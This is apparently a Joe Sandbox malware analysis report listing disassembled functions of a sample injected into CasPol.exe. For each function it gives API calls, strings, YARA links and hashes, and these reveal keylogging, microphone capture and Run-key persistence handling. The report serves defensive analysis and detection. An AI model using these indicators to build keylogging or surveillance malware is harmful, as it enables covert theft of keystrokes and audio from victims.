                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                            Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 481472006-1507639952
                                                                                                            • Opcode ID: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                            • Opcode Fuzzy Hash: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                            Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                            • API String ID: 481472006-2430845779
                                                                                                            • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                            • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                            Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExistsFilePath
                                                                                                            • String ID: alarm.wav$xIG
                                                                                                            • API String ID: 1174141254-4080756945
                                                                                                            • Opcode ID: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                            • Opcode Fuzzy Hash: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                            Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                            • Opcode ID: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                            • Opcode Fuzzy Hash: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                            Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                            • String ID: T=G
                                                                                                            • API String ID: 2315374483-379896819
                                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                            Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocaleValid
                                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                                            • API String ID: 1901932003-3128777819
                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                            Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: T=G$T=G
                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                            Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                            Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00448825
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                            • String ID: `@$`@
                                                                                                            • API String ID: 1353095263-20545824
                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                            Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State
                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                            Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteOpenValue
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                            Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                            Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                            Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0
                                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759